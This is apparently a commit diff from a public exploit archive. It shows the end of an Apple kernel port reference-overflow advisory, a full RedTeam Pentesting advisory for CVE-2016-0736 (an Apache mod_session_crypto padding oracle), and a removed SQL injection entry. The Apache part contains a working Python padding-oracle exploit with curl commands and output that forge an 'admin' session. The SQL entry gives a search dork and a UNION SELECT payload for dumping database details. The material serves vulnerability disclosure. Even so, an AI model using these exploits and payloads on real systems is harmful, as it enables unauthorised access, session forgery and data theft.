||||
|
||||
if (!dict) {
|
||||
err = kIOReturnBadArgument;
|
||||
continue;
|
||||
}
|
||||
...
|
||||
} while( false );
|
||||
|
||||
return( err );
|
||||
|
||||
|
||||
This inner function has many failure cases (wrong kernel port, invalid serialized data) which we can easily trigger and these error paths lead
|
||||
to this inner function not taking ownership of the wake_port argument. However, MIG will only see the return value of the outer internal_io_service_add_notification_ool
|
||||
which will always return success if we pass a valid ool memory descriptor. This violates ipc_kobject_server's ownership model where success means ownership
|
||||
was taken of all rights, not just some.
|
||||
|
||||
What this leads to is actually quite a nice primitive for constructing an ipc_port_t reference count overflow without leaking any memory.
|
||||
|
||||
If we call io_service_add_notification_ool with a valid ool descriptor, but fill it with data that causes OSUnserializeXML to return an error then
|
||||
we can get that memory freed (via the vm_deallocate call above) but the reference on the wake port will be leaked since ipc_kmsg_free will be called, not
|
||||
ipc_kmsg_destroy.
|
||||
|
||||
If we send this request 0xffffffff times we can cause a ipc_port_t's io_references field to overflow to 0; the next time it's used the ref will go 0 -> 1 -> 0
|
||||
and the object will be free'd but we'll still have a dangling pointer in our process's ports table.
|
||||
|
||||
As well as being a regular kernel UaF this also gives us the opportunity to do all kinds of fun mach port related logic attacks, eg getting send rights to
|
||||
other task's task ports via our dangling ipc_port_t pointer.
|
||||
|
||||
** practicality **
|
||||
|
||||
On my 4 year old dual core MBA 5,2 running with two threads this PoC takes around 8 hours after which you should see a kernel panic indicative of a UaF.
|
||||
Note that there are no resources leaks involved here so you can run it even on very constrained systems like an iPhone and it will work fine,
|
||||
albeit a bit slowly :)
|
||||
|
||||
This code is reachable from all sandboxed environments.
|
||||
|
||||
** fixes **
|
||||
|
||||
One approach to fixing this issue would be to do something similar to OSObjects which use a saturating reference count and leak the object if the reference count saturates
|
||||
|
||||
I fear there are a great number of similar issues so just fixing this once instance may not be enough.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
|
|
376
platforms/multiple/webapps/40961.py
Executable file
376
platforms/multiple/webapps/40961.py
Executable file
|
@ -0,0 +1,376 @@
|
|||
'''
|
||||
Advisory: Padding Oracle in Apache mod_session_crypto
|
||||
|
||||
During a penetration test, RedTeam Pentesting discovered a Padding
|
||||
Oracle vulnerability in mod_session_crypto of the Apache web server.
|
||||
This vulnerability can be exploited to decrypt the session data and even
|
||||
encrypt attacker-specified data.
|
||||
|
||||
|
||||
Details
|
||||
=======
|
||||
|
||||
Product: Apache HTTP Server mod_session_crypto
|
||||
Affected Versions: 2.3 to 2.5
|
||||
Fixed Versions: 2.4.25
|
||||
Vulnerability Type: Padding Oracle
|
||||
Security Risk: high
|
||||
Vendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html
|
||||
Vendor Status: fixed version released
|
||||
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt
|
||||
Advisory Status: published
|
||||
CVE: CVE-2016-0736
|
||||
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736
|
||||
|
||||
|
||||
Introduction
|
||||
============
|
||||
|
||||
The module mod_session_crypto of the Apache HTTP Server can be used in
|
||||
conjunction with the modules mod_session and mod_session_cookie to store
|
||||
session data in an encrypted cookie within the users' browsers. This
|
||||
avoids server-side session state so that incoming HTTP requests can be
|
||||
easily distributed amongst a number of application web servers which do
|
||||
not need to share session state.
|
||||
|
||||
|
||||
More Details
|
||||
============
|
||||
|
||||
The module mod_session_crypto uses symmetric cryptography to encrypt and
|
||||
decrypt session data and uses mod_session to store the encrypted data in
|
||||
a cookie (usually called "session") within the user's browser. The
|
||||
decrypted session is then made available to the application in an
|
||||
environment variable (in case of a CGI script) or in a custom HTTP
|
||||
request header. The application can add a custom HTTP response header
|
||||
(usually "X-Replace-Session") which instructs the HTTP server to replace
|
||||
the session's content with the value of the header. Detailed
|
||||
instructions to set up mod_session and mod_session_crypto can be found
|
||||
in the documentation:
|
||||
https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples
|
||||
|
||||
The module mod_session_crypto is configured to use either 3DES or AES
|
||||
with various key sizes, defaulting to AES256. Encryption is handled by
|
||||
the function "encrypt_string":
|
||||
|
||||
modules/session/mod_session_crypto.c
|
||||
------------------------------------------------------------------------
|
||||
/**
|
||||
* Encrypt the string given as per the current config.
|
||||
*
|
||||
* Returns APR_SUCCESS if successful.
|
||||
*/
|
||||
static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,
|
||||
session_crypto_dir_conf *dconf, const char *in, char **out)
|
||||
{
|
||||
[...]
|
||||
apr_crypto_key_t *key = NULL;
|
||||
[...]
|
||||
const unsigned char *iv = NULL;
|
||||
[...]
|
||||
|
||||
/* use a uuid as a salt value, and prepend it to our result */
|
||||
apr_uuid_get(&salt);
|
||||
|
||||
[...]
|
||||
|
||||
res = apr_crypto_passphrase(&key, &ivSize, passphrase,
|
||||
strlen(passphrase),
|
||||
(unsigned char *) (&salt), sizeof(apr_uuid_t),
|
||||
*cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
|
||||
|
||||
[...]
|
||||
|
||||
res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);
|
||||
[...]
|
||||
res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,
|
||||
strlen(in), block);
|
||||
[...]
|
||||
res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);
|
||||
[...]
|
||||
|
||||
/* prepend the salt and the iv to the result */
|
||||
combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));
|
||||
memcpy(combined, &salt, sizeof(apr_uuid_t));
|
||||
memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);
|
||||
memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);
|
||||
|
||||
/* base64 encode the result */
|
||||
base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +
|
||||
sizeof(apr_uuid_t) + 1)
|
||||
* sizeof(char));
|
||||
[...]
|
||||
return res;
|
||||
}
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The source code shows that an encryption key is derived from the
|
||||
configured password and a randomly chosen salt by calling the function
|
||||
"apr_crypto_passphrase". This function internally uses PBKDF2 to derive
|
||||
the key. The data is then encrypted and the salt and IV prepended to the
|
||||
encrypted data. Before returning to the caller, the result is encoded as
|
||||
base64.
|
||||
|
||||
This procedure does not guarantee integrity of the ciphertext, so the
|
||||
Apache module is unable to detect whether a session sent back to the
|
||||
server has been tampered with. Depending on the application this often
|
||||
means that attackers are able to exploit a Padding Oracle vulnerability.
|
||||
This allows decrypting the session and encrypting arbitrary data chosen
|
||||
by the attacker.
|
||||
|
||||
|
||||
Proof of Concept
|
||||
================
|
||||
|
||||
The vulnerability can be reproduced as follows. First, the modules
|
||||
mod_session, mod_session_crypto and mod_session_cookie are enabled and
|
||||
configured:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
Session On
|
||||
SessionEnv On
|
||||
SessionCookieName session path=/
|
||||
SessionHeader X-Replace-Session
|
||||
SessionCryptoPassphrase RedTeam
|
||||
------------------------------------------------------------------------
|
||||
|
||||
In addition, CGI scripts are enabled for a folder and the following CGI
|
||||
script is saved as "status.rb" and is made available to clients:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
require 'cgi'
|
||||
|
||||
cgi = CGI.new
|
||||
data = CGI.parse(ENV['HTTP_SESSION'])
|
||||
|
||||
if data.has_key? 'username'
|
||||
puts
|
||||
puts "your username is %s" % data['username']
|
||||
exit
|
||||
end
|
||||
|
||||
puts "X-Replace-Session: username=guest×tamp=" + Time.now.strftime("%s")
|
||||
puts
|
||||
puts "not logged in"
|
||||
------------------------------------------------------------------------
|
||||
|
||||
Once the CGI script is correctly set up, the command-line HTTP client curl
|
||||
can be used to access it:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb
|
||||
HTTP/1.1 200 OK
|
||||
Date: Tue, 19 Jan 2016 13:23:19 GMT
|
||||
Server: Apache/2.4.10 (Ubuntu)
|
||||
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
|
||||
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
|
||||
Cache-Control: no-cache
|
||||
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
|
||||
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: application/x-ruby
|
||||
|
||||
not logged in
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The example shows that a new encrypted cookie with the name "session" is
|
||||
returned, and the response body contains the text "not logged in".
|
||||
Calling the script again with the cookie just returned reveals that the
|
||||
username in the session is set to "guest":
|
||||
|
||||
------------------------------------------------------------------------
|
||||
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
|
||||
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \
|
||||
http://127.0.0.1:8080/cgi-bin/status.rb
|
||||
|
||||
your username is guest
|
||||
------------------------------------------------------------------------
|
||||
|
||||
Sending a modified cookie ending in "u=" instead of "U=" will invalidate
|
||||
the padding at the end of the ciphertext, so the session cannot be
|
||||
decrypted correctly and is therefore not passed to the CGI script, which
|
||||
returns the text "not logged in" again:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
|
||||
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \
|
||||
http://127.0.0.1:8080/cgi-bin/status.rb
|
||||
|
||||
not logged in
|
||||
------------------------------------------------------------------------
|
||||
|
||||
This verifies the existence of the Padding Oracle vulnerability. The
|
||||
Python library[1] python-paddingoracle was then used to implement
|
||||
decrypting the session by exploiting the Padding Oracle vulnerability.
|
||||
|
||||
exploit.py
|
||||
------------------------------------------------------------------------
|
||||
'''
|
||||
|
||||
from paddingoracle import BadPaddingException, PaddingOracle
|
||||
from base64 import b64encode, b64decode
|
||||
import requests
|
||||
|
||||
class PadBuster(PaddingOracle):
|
||||
def __init__(self, valid_cookie, **kwargs):
|
||||
super(PadBuster, self).__init__(**kwargs)
|
||||
self.wait = kwargs.get('wait', 2.0)
|
||||
self.valid_cookie = valid_cookie
|
||||
|
||||
def oracle(self, data, **kwargs):
|
||||
v = b64encode(self.valid_cookie+data)
|
||||
|
||||
response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',
|
||||
cookies=dict(session=v), stream=False, timeout=5, verify=False)
|
||||
|
||||
if 'username' in response.content:
|
||||
logging.debug('No padding exception raised on %r', v)
|
||||
return
|
||||
|
||||
raise BadPaddingException
|
||||
|
||||
if __name__ == '__main__':
|
||||
import logging
|
||||
import sys
|
||||
|
||||
if not sys.argv[2:]:
|
||||
print 'Usage: [encrypt|decrypt] <session value> <plaintext>'
|
||||
sys.exit(1)
|
||||
|
||||
logging.basicConfig(level=logging.WARN)
|
||||
mode = sys.argv[1]
|
||||
session = b64decode(sys.argv[2])
|
||||
padbuster = PadBuster(session)
|
||||
|
||||
if mode == "decrypt":
|
||||
cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])
|
||||
print('Decrypted session:\n%r' % cookie)
|
||||
elif mode == "encrypt":
|
||||
key = session[0:16]
|
||||
plaintext = sys.argv[3]
|
||||
|
||||
s = padbuster.encrypt(plaintext, block_size=16)
|
||||
|
||||
data = b64encode(key+s[0:len(s)-16])
|
||||
print('Encrypted session:\n%s' % data)
|
||||
else:
|
||||
print "invalid mode"
|
||||
sys.exit(1)
|
||||
|
||||
'''
|
||||
------------------------------------------------------------------------
|
||||
|
||||
This Python script can then be used to decrypt the session:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
|
||||
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=
|
||||
Decrypted session:
|
||||
b'username=guest×tamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'
|
||||
|
||||
real 6m43.088s
|
||||
user 0m15.464s
|
||||
sys 0m0.976s
|
||||
------------------------------------------------------------------------
|
||||
|
||||
In this sample application, the username and a timestamp are included in
|
||||
the session data. The Python script can also be used to encrypt a new
|
||||
session containing the username "admin":
|
||||
|
||||
------------------------------------------------------------------------
|
||||
$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
|
||||
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
|
||||
RU= username=admin
|
||||
|
||||
Encrypted session:
|
||||
sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY
|
||||
|
||||
real3m38.002s
|
||||
users0m8.536s
|
||||
sys0m0.512s
|
||||
|
||||
------------------------------------------------------------------------
|
||||
|
||||
Sending this newly encrypted session to the server shows that the
|
||||
username is now "admin":
|
||||
|
||||
------------------------------------------------------------------------
|
||||
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
|
||||
zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb
|
||||
|
||||
your username is admin
|
||||
------------------------------------------------------------------------
|
||||
|
||||
|
||||
Workaround
|
||||
==========
|
||||
|
||||
Use a different means to store the session, e.g. in a database by using
|
||||
mod_session_dbd.
|
||||
|
||||
|
||||
Fix
|
||||
===
|
||||
|
||||
Update to Apache HTTP version 2.4.25 (see [2]).
|
||||
|
||||
|
||||
Security Risk
|
||||
=============
|
||||
|
||||
Applications which use mod_session_crypto usually store sensitive values
|
||||
in the session and rely on an attacker's inability to decrypt or modify
|
||||
the session. Successful exploitation of the Padding Oracle vulnerability
|
||||
subverts this mechanism and allows to construct sessions with arbitrary
|
||||
attacker-specified content. Depending on the application this may
|
||||
completely subvert the application's security. Therefore, this
|
||||
vulnerability poses a high risk.
|
||||
|
||||
|
||||
Timeline
|
||||
========
|
||||
|
||||
2016-01-11 Vulnerability identified
|
||||
2016-01-12 Customer approved disclosure to vendor
|
||||
2016-01-12 CVE number requested
|
||||
2016-01-20 Vendor notified
|
||||
2016-01-22 Vendor confirmed the vulnerability
|
||||
2016-02-03 Vendor provided patch
|
||||
2016-02-04 Apache Security Team assigned CVE number
|
||||
2016-03-03 Requested status update from vendor, no response
|
||||
2016-05-02 Requested status update from vendor, no response
|
||||
2016-07-14 Requested status update and roadmap from vendor
|
||||
2016-07-21 Vendor confirms working on a new released and inquired whether the
|
||||
patch fixes the vulnerability
|
||||
2016-07-22 RedTeam confirms
|
||||
2016-08-24 Requested status update from vendor
|
||||
2016-08-29 Vendor states that there is no concrete timeline
|
||||
2016-12-05 Vendor announces a release
|
||||
2016-12-20 Vendor released fixed version
|
||||
2016-12-23 Advisory released
|
||||
|
||||
|
||||
References
|
||||
==========
|
||||
|
||||
[1] https://github.com/mwielgoszewski/python-paddingoracle
|
||||
[2] http://httpd.apache.org/security/vulnerabilities_24.html
|
||||
|
||||
|
||||
RedTeam Pentesting GmbH
|
||||
=======================
|
||||
|
||||
RedTeam Pentesting offers individual penetration tests performed by a
|
||||
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||
company networks or products are uncovered and can be fixed immediately.
|
||||
|
||||
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||
share its knowledge and enhance the public knowledge with research in
|
||||
security-related areas. The results are made available as public
|
||||
security advisories.
|
||||
|
||||
More information about RedTeam Pentesting can be found at:
|
||||
https://www.redteam-pentesting.de/
|
||||
'''
|
|
@ -1,28 +0,0 @@
|
|||
|___________________________________________________|
|
||||
|
|
||||
| Link Trader (lnkid) Remote SQL Injection Vulnerability
|
||||
|
|
||||
|___________________________________________________
|
||||
|---------------------Hussin X----------------------|
|
||||
|
|
||||
| Author: Hussin X
|
||||
|
|
||||
| Home : www.iq-ty.com<http://www.iq-ty.com>
|
||||
|
|
||||
| email: darkangel_g85[at]Yahoo[DoT]com
|
||||
|
|
||||
|
|
||||
|___________________________________________________
|
||||
| |
|
||||
|
|
||||
| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
|
||||
|
|
||||
| DorK : inurl:ratelink.php?lnkid=
|
||||
|___________________________________________________|
|
||||
|
||||
Exploit:
|
||||
|
||||
|
||||
|
||||
www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
|
||||
|
Loading…
Add table
Reference in a new issue